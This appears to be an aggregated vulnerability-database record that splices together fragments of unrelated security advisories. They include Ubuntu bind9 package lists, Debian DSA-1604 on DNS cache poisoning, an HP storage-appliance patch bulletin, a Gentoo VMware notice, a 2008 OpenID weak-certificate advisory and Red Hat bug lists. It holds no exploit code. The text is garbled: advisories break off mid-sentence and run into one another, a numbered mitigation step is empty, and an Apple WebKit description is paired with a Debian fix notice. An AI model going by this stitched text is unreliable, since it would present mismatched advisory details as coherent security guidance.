http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9_9.4.1-P1-3ubuntu2_sparc.deb
Size/MD5: 267886 15ae5b64e2d7f0a84610dca3265f36fe
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/dnsutils_9.4.1-P1-3ubuntu2_sparc.deb
Size/MD5: 114014 18755ede3d638c17c7292bbc0d0b331c
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind-dev_9.4.1-P1-3ubuntu2_sparc.deb
Size/MD5: 1180276 a906d2e8f9b40766735895725112fe04
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind9-30_9.4.1-P1-3ubuntu2_sparc.deb
Size/MD5: 25350 e9e7f9b9c5fc4b6bcaad7e36b7a12c21
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libdns32_9.4.1-P1-3ubuntu2_sparc.deb
Size/MD5: 492286 e367b633343c1841f48eeec01f08e494
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisc32_9.4.1-P1-3ubuntu2_sparc.deb
Size/MD5: 117916 bee4cf76d903bf902a025ea2362cf5ec
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccc30_9.4.1-P1-3ubuntu2_sparc.deb
Size/MD5: 21900 0807caba04fee218b416288eae034b93
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccfg30_9.4.1-P1-3ubuntu2_sparc.deb
Size/MD5: 38438 e11c657acb477041666dd3cccd8bfebc
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/liblwres30_9.4.1-P1-3ubuntu2_sparc.deb
Size/MD5: 39244 da7d911f9a2f97fd6e895736489c22ac
http://security.ubuntu.com/ubuntu/pool/universe/b/bind9/lwresd_9.4.1-P1-3ubuntu2_sparc.deb
Size/MD5: 156818 cada78841afbf1e0caf13f75eadaba51
Updated packages for Ubuntu 8.04 LTS:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9_9.4.2-10ubuntu0.1.diff.gz
Size/MD5: 243611 da5389b9c001fc8105edd135c086b13d
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9_9.4.2-10ubuntu0.1.dsc
Size/MD5: 998 2588a42ba49dd2702130d159c1f68d6d
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9_9.4.2.orig.tar.gz
Size/MD5: 5021880 0aa73c66c206de3da10029bf5f195347
Architecture independent packages:
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9-doc_9.4.2-10ubuntu0.1_all.deb
Size/MD5: 239534 7469deb007e19439a8f5df6a53ecd485
amd64 architecture (Athlon64, Opteron, EM64T Xeon):
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9-host_9.4.2-10ubuntu0.1_amd64.deb
Size/MD5: 47052 24ce8ff319d3a45dc8c572df3bc47ef6
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9_9.4.2-10ubuntu0.1_amd64.deb
Size/MD5: 282744 5d77a9de6d4267405c6c969792a42243
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/dnsutils_9.4.2-10ubuntu0.1_amd64.deb
Size/MD5: 116814 2adb81fed8e7d93cfde2ab01f1050d2e
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind-dev_9.4.2-10ubuntu0.1_amd64.deb
Size/MD5: 1188376 36c0b944f5e23f76ba587e756e7c4bdb
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind9-30_9.4.2-10ubuntu0.1_amd64.deb
Size/MD5: 27208 be7b3257b0eb9014f033b4ead73bb7a7
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libdns35_9.4.2-10ubuntu0.1_amd64.deb
Size/MD5: 550042 268c59c90f72e47690a2f64fccc296c6
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisc32_9.4.2-10ubuntu0.1_amd64.deb
Size/MD5: 138186 5f08619b4b4198fb6176f4d914e74b54
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccc30_9.4.2-10ubuntu0.1_amd64.deb
Size/MD5: 24666 f584f72af33412695ab6cfb81c891ee4
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccfg30_9.4.2-10ubuntu0.1_amd64.deb
Size/MD5: 44570 f63b6e57da24654d0ffc243936a5a153
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/liblwres30_9.4.2-10ubuntu0.1_amd64.deb
Size/MD5: 42802 4542b6bea7110e1cbf557346fc5536ad
http://security.ubuntu.com/ubuntu/pool/universe/b/bind9/lwresd_9.4.2-10ubuntu0.1_amd64.deb
Size/MD5: 171006 c96cfef97c3950ab59b80a7b1d3aa868
i386 architecture (x86 compatible Intel/AMD):
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9-host_9.4.2-10ubuntu0.1_i386.deb
Size/MD5: 44692 62a8e406937a5be466977c5b47f9a659
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9_9.4.2-10ubuntu0.1_i386.deb
Size/MD5: 267508 da18e50b8467dbd7730640a09c52d188
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/dnsutils_9.4.2-10ubuntu0.1_i386.deb
Size/MD5: 110460 480313c340c47e5d6f5167c11161daa7
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind-dev_9.4.2-10ubuntu0.1_i386.deb
Size/MD5: 1065190 6fe78d85bdae7a9970c769dd2d1ebdcf
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind9-30_9.4.2-10ubuntu0.1_i386.deb
Size/MD5: 27254 2ba88324a0225ccab2b826dcc2f0f202
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libdns35_9.4.2-10ubuntu0.1_i386.deb
Size/MD5: 493370 5916fe8f22b1a19d0dde5f9e9596353f
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisc32_9.4.2-10ubuntu0.1_i386.deb
Size/MD5: 125982 26501d011be6c34b7874b19ceabd0148
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccc30_9.4.2-10ubuntu0.1_i386.deb
Size/MD5: 22852 13693beb84952c55cf78f4275c39aba7
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccfg30_9.4.2-10ubuntu0.1_i386.deb
Size/MD5: 38258 34107c4916cb13ac651d16706e9d9b9a
http://security.ubuntu.com/ubuntu/pool/main/b/bind9/liblwres30_9.4.2-10ubuntu0.1_i386.deb
Size/MD5: 40058 443bc171d30e2f262bb8ce2e3bfe885e
http://security.ubuntu.com/ubuntu/pool/universe/b/bind9/lwresd_9.4.2-10ubuntu0.1_i386.deb
Size/MD5: 159118 b31758442a36011d79dde9c485fca1da
lpia architecture (Low Power Intel Architecture):
http://ports.ubuntu.com/pool/main/b/bind9/bind9-host_9.4.2-10ubuntu0.1_lpia.deb
Size/MD5: 45254 659ea8656a46bc1265f0bf3049ffc511
http://ports.ubuntu.com/pool/main/b/bind9/bind9_9.4.2-10ubuntu0.1_lpia.deb
Size/MD5: 267536 13c20e925a9a9ae1353b63fde5ce8555
http://ports.ubuntu.com/pool/main/b/bind9/dnsutils_9.4.2-10ubuntu0.1_lpia.deb
Size/MD5: 111858 ce4c215e0dfc3a4c1e53b431264becf7
http://ports.ubuntu.com/pool/main/b/bind9/libbind-dev_9.4.2-10ubuntu0.1_lpia.deb
Size/MD5: 1068570 9680708be2a7840be99f2894234757bf
http://ports.ubuntu.com/pool/main/b/bind9/libbind9-30_9.4.2-10ubuntu0.1_lpia.deb
Size/MD5: 27248 f0a51f7ebaeb86afa2f466c1e4b1b4c0
http://ports.ubuntu.com/pool/main/b/bind9/libdns35_9.4.2-10ubuntu0.1_lpia.deb
Size/MD5: 488706 325b144544a6dfd1917210c9a02ec423
http://ports.ubuntu.com/pool/main/b/bind9/libisc32_9.4.2-10ubuntu0.1_lpia.deb
Size/MD5: 122606 316c7a93002a350fa04f7956483c6efe
http://ports.ubuntu.com/pool/main/b/bind9/libisccc30_9.4.2-10ubuntu0.1_lpia.deb
Size/MD5: 22522 66d3aaa993507238b341578bb534a0aa
http://ports.ubuntu.com/pool/main/b/bind9/libisccfg30_9.4.2-10ubuntu0.1_lpia.deb
Size/MD5: 37670 b58cc5a2d27f02cac5b954cf4cb1cec5
http://ports.ubuntu.com/pool/main/b/bind9/liblwres30_9.4.2-10ubuntu0.1_lpia.deb
Size/MD5: 39810 6a5c7b4e2a52a61258d86618f3a27106
http://ports.ubuntu.com/pool/universe/b/bind9/lwresd_9.4.2-10ubuntu0.1_lpia.deb
Size/MD5: 158506 b2064557c74e536b96d77a707068c933
powerpc architecture (Apple Macintosh G3/G4/G5):
http://ports.ubuntu.com/pool/main/b/bind9/bind9-host_9.4.2-10ubuntu0.1_powerpc.deb
Size/MD5: 49064 77fb0a3b0c381e9f4cf561240f801e99
http://ports.ubuntu.com/pool/main/b/bind9/bind9_9.4.2-10ubuntu0.1_powerpc.deb
Size/MD5: 297108 927db70c3f13cb7642f8e9dfe9d2e378
http://ports.ubuntu.com/pool/main/b/bind9/dnsutils_9.4.2-10ubuntu0.1_powerpc.deb
Size/MD5: 124214 fb0b53b2b7f5fd750c3ee3785038efea
http://ports.ubuntu.com/pool/main/b/bind9/libbind-dev_9.4.2-10ubuntu0.1_powerpc.deb
Size/MD5: 1271364 32f252c1f510f5d0f5f2860a75fccf8b
http://ports.ubuntu.com/pool/main/b/bind9/libbind9-30_9.4.2-10ubuntu0.1_powerpc.deb
Size/MD5: 29764 2111df6f219f9e4a421329209eee6489
http://ports.ubuntu.com/pool/main/b/bind9/libdns35_9.4.2-10ubuntu0.1_powerpc.deb
Size/MD5: 529240 e66e625de5160092f4ac4b9b505bd3ae
http://ports.ubuntu.com/pool/main/b/bind9/libisc32_9.4.2-10ubuntu0.1_powerpc.deb
Size/MD5: 137960 e581851a0e71ada301415c006e5697d9
http://ports.ubuntu.com/pool/main/b/bind9/libisccc30_9.4.2-10ubuntu0.1_powerpc.deb
Size/MD5: 26412 12e5213a39740e05cdf4ed87dbfd055e
http://ports.ubuntu.com/pool/main/b/bind9/libisccfg30_9.4.2-10ubuntu0.1_powerpc.deb
Size/MD5: 43508 b8aab766d691b13f0df8796252bfe7a5
http://ports.ubuntu.com/pool/main/b/bind9/liblwres30_9.4.2-10ubuntu0.1_powerpc.deb
Size/MD5: 44292 78170e54852c2e28718dd26c72148165
http://ports.ubuntu.com/pool/universe/b/bind9/lwresd_9.4.2-10ubuntu0.1_powerpc.deb
Size/MD5: 171502 0c747e830656e34d4cd5b84f8ee38551
sparc architecture (Sun SPARC/UltraSPARC):
http://ports.ubuntu.com/pool/main/b/bind9/bind9-host_9.4.2-10ubuntu0.1_sparc.deb
Size/MD5: 46786 2f07cd43ef71146ec839172a9318eb22
http://ports.ubuntu.com/pool/main/b/bind9/bind9_9.4.2-10ubuntu0.1_sparc.deb
Size/MD5: 281936 b97f8461fb12702ffde3b1536e11531c
http://ports.ubuntu.com/pool/main/b/bind9/dnsutils_9.4.2-10ubuntu0.1_sparc.deb
Size/MD5: 116124 cf6ec9328492c928d5d8064f09d5bcda
http://ports.ubuntu.com/pool/main/b/bind9/libbind-dev_9.4.2-10ubuntu0.1_sparc.deb
Size/MD5: 1178958 f21fed7bb01a12a74061b3cf03000b54
http://ports.ubuntu.com/pool/main/b/bind9/libbind9-30_9.4.2-10ubuntu0.1_sparc.deb
Size/MD5: 26652 b650866c75829e84f35592fff5d6c950
http://ports.ubuntu.com/pool/main/b/bind9/libdns35_9.4.2-10ubuntu0.1_sparc.deb
Size/MD5: 500058 d99f74a53d5b2b6167eae4bd9f56d3ed
http://ports.ubuntu.com/pool/main/b/bind9/libisc32_9.4.2-10ubuntu0.1_sparc.deb
Size/MD5: 127824 c93136898c8ce5f8ac90ba46daacc015
http://ports.ubuntu.com/pool/main/b/bind9/libisccc30_9.4.2-10ubuntu0.1_sparc.deb
Size/MD5: 22688 e69b52b3505b614f95836502f06bd1ac
http://ports.ubuntu.com/pool/main/b/bind9/libisccfg30_9.4.2-10ubuntu0.1_sparc.deb
Size/MD5: 38792 3167cb62f05d65b3971cc90f1093cd6a
http://ports.ubuntu.com/pool/main/b/bind9/liblwres30_9.4.2-10ubuntu0.1_sparc.deb
Size/MD5: 38984 92a1a25f10ed41b0bd3a25699e5d76ff
http://ports.ubuntu.com/pool/universe/b/bind9/lwresd_9.4.2-10ubuntu0.1_sparc.deb
Size/MD5: 169952 3656ebd36bb152e7e18c984f0d8a31fe
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
- ------------------------------------------------------------------------
Debian Security Advisory DSA-1604-1 security@debian.org
http://www.debian.org/security/ Florian Weimer
July 08, 2008 http://www.debian.org/security/faq
- ------------------------------------------------------------------------
Package : bind
Vulnerability : DNS cache poisoning
Problem type : remote
Debian-specific: no
CVE Id(s) : CVE-2008-1447
CERT advisory : VU#800113
Dan Kaminsky discovered that properties inherent to the DNS protocol
lead to practical DNS cache poisoning attacks. Among other things,
successful attacks can lead to misdirected web traffic and email
rerouting.
The BIND 8 legacy code base could not be updated to include the
recommended countermeasure (source port randomization, see DSA-1603-1
for details). There are two ways to deal with this situation:
1. Upgrade to BIND 9 (or another implementation with source port
randomization). The documentation included with BIND 9 contains a
migration guide. Configure the BIND 8 resolver to forward queries to a BIND 9
resolver. Provided that the network between both resolvers is trusted,
this protects the BIND 8 resolver from cache poisoning attacks (to the
same degree that the BIND 9 resolver is protected).
This problem does not apply to BIND 8 when used exclusively as an
authoritative DNS server. It is theoretically possible to safely use
BIND 8 in this way, but updating to BIND 9 is strongly recommended.
BIND 8 (that is, the bind package) will be removed from the etch
distribution in a future point release. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c01503743
Version: 1
HPSBST02350 SSRT080102 rev.1 - Storage Management Appliance (SMA), Microsoft Patch Applicability MS08-037 to MS08-040
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2008-07-14
Last Updated: 2008-07-14
Potential Security Impact: Please check the table below
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY
Various potential security vulnerabilities have been identified in Microsoft software that is running on the Storage Management Appliance (SMA). Some of these vulnerabilities may be pertinent to the SMA, please check the table in the Resolution section of this Security Bulletin.
References: MS08-037 (CVE-2008-1447, CVE-2008-1454), MS08-038 (CVE-2008-1435), MS08-039 (CVE-2008-2247, CVE-2008-2248), MS08-040 (CVE-2008-0085, CVE-2008-0086, CVE-2008-0106, CVE-2008-0107).
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
Storage Management Appliance v2.1 Software running on:
Storage Management Appliance I
Storage Management Appliance II
Storage Management Appliance III
BACKGROUND
CVSS 2.0 Base Metrics
===============================================
Reference Base Vector Base Score
-- Not Applicable --
===============================================
Information on CVSS is documented in HP Customer Notice: HPSN-2008-002.
Patches released by Microsoft after MS06-051 are covered by monthly Security Bulletins.
For the full archived list of Microsoft security updates applicable for Storage Management Appliance software v2.1, please refer to the following Security Bulletins available on the IT Resource Center (ITRC) Web site: http://www.itrc.hp.com/service/cki/secBullArchive.do
For patches released by Microsoft in 2003, MS03-001 to MS03-051 refer to Security Bulletin HPSBST02146
For patches released by Microsoft in 2004, MS04-001 to MS04-045 refer to Security Bulletin HPSBST02147
For patches released by Microsoft in 2005, MS05-001 to MS05-055 refer to Security Bulletin HPSBST02148
For patches released by Microsoft in 2006, MS06-001 to MS06-051 refer to Security Bulletin HPSBST02140
The Microsoft patch index archive and further details about all Microsoft patches can be found on the following Web site: http://www.microsoft.com/technet/security/bulletin/summary.mspx
NOTE: The SMA must have all pertinent SMA Service Packs applied
Windows 2000 Update Rollup 1
Customers are advised to download and install the Windows 2000 Update Rollup 1 for Service Pack 4 on SMA v2.1. For more information please refer to the Windows 2000 Update Rollup 1 for Service Pack 4 and Storage Management Appliance v2.1 advisory at the following website: http://h20000.www2.hp.com/bizsupport/TechSupport/DocumentIndex.jsp?contentType=SupportManual&lang=en&cc=us&docIndexId=179111&taskId=101&prodTypeId=12169&prodSeriesId=315667
Windows 2000 Update Rollup 1 for SP4 does not include security updates released after April 30, 2005 starting from MS05-026. It also does not include patches MS04-003 and MS04-028. Please install these patches in addition to Windows 2000 Update Rollup 1 for SP4, if they have not been installed already
RESOLUTION
HP strongly recommends the immediate installation of all security patches that apply to third party software which is integrated with SMA software products supplied by HP, and that patches are applied in accordance with an appropriate patch management policy.
NOTE: Patch installation instructions are shown at the end of this table.
-------------------------------------------------
MS Patch - MS08-037 Vulnerabilities in DNS Could Allow Spoofing (953230)
Analysis - Patch will run successfully.
Action - For SMA v2.1, customers should download patch from Microsoft and install.
-------------------------------------------------
MS Patch - MS08-038 Vulnerability in Windows Explorer Could Allow Remote Code Execution (950582)
Analysis - SMA does not have this component.
Action - Patch will not run successfully. Customers should not be concerned with this issue
-------------------------------------------------
MS Patch - MS08-039 Vulnerabilities in Outlook Web Access for Exchange Server Could Allow Elevation of Privilege (953747)
Analysis - SMA does not have this component.
Action - Patch will not run successfully. Customers should not be concerned with this issue
-------------------------------------------------
MS Patch - MS08-040 Vulnerabilities in Microsoft SQL Server Could Allow Elevation of Privilege (941203)
Analysis - SMA does not have this component.
Action - Patch will not run successfully. Customers should not be concerned with this issue
-------------------------------------------------
Installation Instructions: (if applicable)
Download patches to a system other than the SMA
Copy the patch to a floppy diskette or to a CD
Execute the patch by using Terminal Services to the SMA or by attaching a keyboard, monitor and mouse to the SMA.
Note: The Microsoft Windows Installer 3.1 is supported on SMA v2.1. For more information please refer at the following website: http://www.microsoft.com/downloads/details.aspx?FamilyID=889482fc-5f56-4a38-b838-de776fd4138c&hash=SYSSXDF&displaylang=en
PRODUCT SPECIFIC INFORMATION
None
HISTORY
Version:1 (rev.1) - 14 July 2008 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.
Support: For further information, contact normal HP Services support channel.
Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com
It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information.
To get the security-alert PGP key, please send an e-mail message as follows:
To: security-alert@hp.com
Subject: get key
Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email:
http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC
On the web page: ITRC security bulletins and patch sign-up
Under Step1: your ITRC security bulletins and patches
- check ALL categories for which alerts are required and continue.
Under Step2: your ITRC operating systems
- verify your operating system selections are checked and save.
To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php
Log in on the web page: Subscriber's choice for Business: sign-in.
On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections.
To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do
* The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title:
GN = HP General SW
MA = HP Management Agents
MI = Misc. 3rd Party SW
MP = HP MPE/iX
NS = HP NonStop Servers
OV = HP OpenVMS
PI = HP Printing & Imaging
ST = HP Storage SW
TL = HP Trusted Linux
TU = HP Tru64 UNIX
UX = HP-UX
VV = HP VirtualVault
System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions.
"HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement."
\xa9Copyright 2008 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental, special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.
-----BEGIN PGP SIGNATURE-----
Version: PGP 8.1
iQA/AwUBSHuXnuAfOvwtKn1ZEQK1JwCg3stqwQ8mf3LcD2QuflMjMZtKvnYAnjnf
TEtj6VDp/qFsIXFzdB/JYKQT
=eGwf
-----END PGP SIGNATURE-----
.
Background
==========
VMware Player, Server, and Workstation allow emulation of a complete PC
on a PC without the usual performance overhead of most emulators. Users should migrate
to another package if one is available or wait for the
existing packages to be marked stable by their
architecture maintainers. Please review the CVE identifiers referenced below for
details.
Impact
======
Local users may be able to gain escalated privileges, cause a Denial of
Service, or gain sensitive information. Remote attackers also may be able to spoof DNS
traffic, read arbitrary files, or inject arbitrary web script to the
VMware Server Console.
Resolution
==========
Gentoo discontinued support for VMware Player. We recommend that users
unmerge VMware Player:
# emerge --unmerge "app-emulation/vmware-player"
NOTE: Users could upgrade to ">=app-emulation/vmware-player-3.1.5",
however these packages are not currently stable.
Gentoo discontinued support for VMware Workstation. We recommend that
users unmerge VMware Workstation:
# emerge --unmerge "app-emulation/vmware-workstation"
NOTE: Users could upgrade to
">=app-emulation/vmware-workstation-7.1.5", however these packages are
not currently stable.
Gentoo discontinued support for VMware Server. Security Advisory (08-AUG-2008) (CVE-2008-3280)
===============================================
Ben Laurie of Google's Applied Security team, while working with an
external researcher, Dr. Richard Clayton of the Computer Laboratory,
Cambridge University, found that various OpenID Providers (OPs) had
TLS Server Certificates that used weak keys, as a result of the Debian
Predictable Random Number Generator (CVE-2008-0166).
In combination with the DNS Cache Poisoning issue (CVE-2008-1447) and
the fact that almost all SSL/TLS implementations do not consult CRLs
(currently an untracked issue), this means that it is impossible to
rely on these OPs.
Attack Description
------------------
In order to mount an attack against a vulnerable OP, the attacker
first finds the private key corresponding to the weak TLS
certificate. He then sets up a website masquerading as the original
OP, both for the OpenID protocol and also for HTTP/HTTPS.
Then he poisons the DNS cache of the victim to make it appear that his
server is the true OpenID Provider.
There are two cases, one is where the victim is a user trying to
identify themselves, in which case, even if they use HTTPS to "ensure"
that the site they are visiting is indeed their provider, they will be
unable to detect the substitution and will give their login
credentials to the attacker.
The second case is where the victim is the Relying Party (RP). In this
case, even if the RP uses TLS to connect to the OP, as is recommended
for higher assurance, he will not be defended, as the vast majority of
OpenID implementations do not check CRLs, and will, therefore, accept
the malicious site as the true OP.
Mitigation
----------
Mitigation is surprisingly hard. In theory the vulnerable site should
revoke their weak certificate and issue a new one.
However, since the CRLs will almost certainly not be checked, this
means the site will still be vulnerable to attack for the lifetime of
the certificate (and perhaps beyond, depending on user
behaviour). Note that shutting down the site DOES NOT prevent the
attack.
Therefore mitigation falls to other parties.
1. Browsers must check CRLs by default.
2. OpenID libraries must check CRLs.
3.
4. Until either 1 and 2 or 3 have been done, OpenID cannot be trusted
for any OP that cannot demonstrate it has never had a weak
certificate.
Discussion
----------
Normally, when security problems are encountered with a single piece
of software, the responsible thing to do is to is to wait until fixes
are available before making any announcement. However, as a number of
examples in the past have demonstrated, this approach does not work
particularly well when many different pieces of software are involved
because it is necessary to coordinate a simultaneous release of the
fixes, whilst hoping that the very large number of people involved
will cooperate in keeping the vulnerability secret.
In the present situation, the fixes will involve considerable
development work in adding CRL handling to a great many pieces of
openID code. This is a far from trivial amount of work.
The fixes will also involve changes to browser preferences to ensure
that CRLs are checked by default -- which many vendors have resisted
for years. We are extremely pessimistic that a security vulnerability
in OpenID will be seen as sufficiently important to change the browser
vendors minds.
Hence, we see no value in delaying this announcement; and by making
the details public as soon as possible, we believe that individuals
who rely on OpenID will be better able to take their own individual
steps to avoid relying upon the flawed certificates we have
identified.
OpenID is at heart quite a weak protocol, when used in its most
general form[1], and consequently there is very limited reliance upon
its security. This means that the consequences of the combination of
attacks that are now possible is nothing like as serious as might
otherwise have been the case.
However, it does give an insight into the type of security disaster
that may occur in the future if we do not start to take CRLs
seriously, but merely stick them onto "to-do" lists or disable them in
the name of tiny performance improvements.
Affected Sites
--------------
There is no central registry of OpenID systems, and so we cannot be
sure that we have identified all of the weak certificates that are
currently being served. The list of those we have found so far is:
openid.sun.com
www.xopenid.net
openid.net.nz
Notes
-----
[1] There are ways of using OpenID that are significantly more secure
than the commonly deployed scheme, I shall describe those in a
separate article.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
|
|
var-202010-1245
|
A logic issue was addressed with improved state management. This issue is fixed in iOS 13.6 and iPadOS 13.6, tvOS 13.4.8, watchOS 6.2.8, Safari 13.1.2, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. Processing maliciously crafted web content may lead to universal cross site scripting. Apple Safari, etc. are all products of Apple (Apple). Apple Safari is a web browser that is the default browser included with the Mac OS X and iOS operating systems. Apple iOS is an operating system developed for mobile devices. Apple tvOS is a smart TV operating system. A cross-site scripting vulnerability exists in the WebKit component of several Apple products. The vulnerability stems from the lack of correct validation of client data in WEB applications. An attacker could exploit this vulnerability to execute client code.
For the stable distribution (buster), these problems have been fixed in
version 2.28.4-1~deb10u1.
We recommend that you upgrade your webkit2gtk packages.
For the detailed security status of webkit2gtk please refer to its
security tracker page at:
https://security-tracker.debian.org/tracker/webkit2gtk
Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/
Mailing list: debian-security-announce@lists.debian.org
-----BEGIN PGP SIGNATURE-----
iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAl8oKD5fFIAAAAAALgAo
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND
z0SagQ//ZltrMBv+gUHbNMk4foYl7hv9PmHRd0U+KR4sdAPvhF+UWYSTJbAbwH1b
PKTByJixoZfCntg/KMd9f16EHX13TbBw5M4rnZ7/4oM5AZfUifGwEwAOH5jK1/IS
1p/CnGlfTc3i5tZhI0xKkSLruSSVswzuikRUQ/4DaC/tRUbzGs67U2iuQ8Z4e8A3
vIe6/P+y6svAsbaSbCBKi72IKzLzkqraBUVXjSgs17xnzkuaqeCBFBQRYDII6gm1
cY0mZd5MknDjc3BrNBhpGA0VJ3SI+6RhM7k7oUKcCCoL2Q6c/PPipSqcLZYita+u
csmvikeusNMOv8Z6JKwvvbjWv6A199x8ddZgjIuQIIWJA4xHbOqJCyzwn9YBEdpS
7DG/VGFRAJW2O7FHBTE04wSjOwxHuRcXra6Yc9Ty80BaWuPOJ/FlfD2X+ojub+i5
L6FHBhR0eQ2e7zW5xd6GnF/WbNYHF09K2qblCRw/DdyL2TLAtVS02JAriUUK0Bwl
3HAtF8a1EjIudabf/uENDq+ZHzd5zbl6maSOKH9e8ajaFFk4wAcRsHbs13v4nnqK
cYuD+n7WHv3uU6VTfRh2nLkyIbR3udoDq1MpJsatuWHNRwnYVI82c/EjsBDkznG6
yYy3d+RnnexDgF4rZ7XuOFK52JEpr5whTGg/Nn7wVw8YQUXXGO0=
=ANGc
-----END PGP SIGNATURE-----
. Description:
Service Telemetry Framework (STF) provides automated collection of
measurements and data from remote clients, such as Red Hat OpenStack
Platform or third-party nodes.
Dockerfiles and scripts should be amended either to refer to this new image
specifically, or to the latest image generally. Bugs fixed (https://bugzilla.redhat.com/):
2107342 - CVE-2022-30631 golang: compress/gzip: stack exhaustion in Reader.Read
5. In addition to persistent storage, Red Hat
OpenShift Container Storage provisions a multicloud data management service
with an S3 compatible API.
These updated images include numerous security fixes, bug fixes, and
enhancements. Solution:
Before applying this update, make sure all previously released errata
relevant to your system have been applied. Bugs fixed (https://bugzilla.redhat.com/):
1806266 - Require an extension to the cephfs subvolume commands, that can return metadata regarding a subvolume
1813506 - Dockerfile not compatible with docker and buildah
1817438 - OSDs not distributed uniformly across OCS nodes on a 9-node AWS IPI setup
1817850 - [BAREMETAL] rook-ceph-operator does not reconcile when osd deployment is deleted when performed node replacement
1827157 - OSD hitting default CPU limit on AWS i3en.2xlarge instances limiting performance
1829055 - [RFE] add insecureEdgeTerminationPolicy: Redirect to noobaa mgmt route (http to https)
1833153 - add a variable for sleep time of rook operator between checks of downed OSD+Node.
1836299 - NooBaa Operator deploys with HPA that fires maxreplicas alerts by default
1842254 - [NooBaa] Compression stats do not add up when compression id disabled
1845976 - OCS 4.5 Independent mode: must-gather commands fails to collect ceph command outputs from external cluster
1849771 - [RFE] Account created by OBC should have same permissions as bucket owner
1853652 - CVE-2020-14040 golang.org/x/text: possibility to trigger an infinite loop in encoding/unicode could lead to crash
1854500 - [tracker-rhcs bug 1838931] mgr/volumes: add command to return metadata of a subvolume snapshot
1854501 - [Tracker-rhcs bug 1848494 ]pybind/mgr/volumes: Add the ability to keep snapshots of subvolumes independent of the source subvolume
1854503 - [tracker-rhcs-bug 1848503] cephfs: Provide alternatives to increase the total cephfs subvolume snapshot counts to greater than the current 400 across a Cephfs volume
1856953 - CVE-2020-15586 golang: data race in certain net/http servers including ReverseProxy can lead to DoS
1858195 - [GSS] registry pod stuck in ContainerCreating due to pvc from cephfs storage class fail to mount
1859183 - PV expansion is failing in retry loop in pre-existing PV after upgrade to OCS 4.5 (i.e. if the PV spec does not contain expansion params)
1859229 - Rook should delete extra MON PVCs in case first reconcile takes too long and rook skips "b" and "c" (spawned from Bug 1840084#c14)
